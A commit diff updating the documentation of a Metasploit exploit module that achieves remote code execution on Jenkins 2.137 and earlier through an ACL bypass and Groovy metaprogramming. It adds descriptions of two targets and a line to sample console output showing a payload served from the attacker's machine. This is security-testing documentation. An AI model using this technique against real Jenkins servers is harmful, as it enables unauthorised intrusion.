Update documentation

documentation/modules/exploit/multi/http/jenkins_metaprogramming.md

@@ -4,6 +4,14 @@ This module exploits a vulnerability in Jenkins dynamic routing to
 bypass the `Overall/Read` ACL and leverage Groovy metaprogramming to
 download and execute a malicious JAR file.
 
+When the `Java Dropper` target is selected, the original entry point
+based on `classLoader.parseClass` is used, which requires the use of
+Groovy metaprogramming to achieve RCE.
+
+When the `Unix In-Memory` target is selected, a newer, higher-level,
+and more universal entry point based on `GroovyShell.parse` is used.
+This permits the use of in-memory arbitrary command execution.
+
 The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
 on later versions of Jenkins.
 
@@ -21,7 +29,8 @@ Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
 ```
 Id  Name
 --  ----
-0   Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)
+0   Unix In-Memory
+1   Java Dropper
 ```
 
 ## Options
@@ -39,6 +48,8 @@ Set this to the Jenkins base path. The default is `/`.
 Set this to the port on which to serve the payload. Change it from 8080
 to something like 8081 if you are testing Jenkins locally on port 8080.
 
+This option is valid only for the `Java Dropper` target.
+
 **ForceExploit**
 
 Set this to `true` to override the `check` result during exploitation.
@@ -54,6 +65,7 @@ msf5 exploit(multi/http/jenkins_metaprogramming) > run
 [+] ACL bypass successful
 [*] Using URL: http://0.0.0.0:8081/
 [*] Local IP: http://192.168.1.2:8081/
+[*] Configuring Java Dropper target
 [*] Sending Jenkins and Groovy go-go-gadgets
 [*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
 [-] Sending 404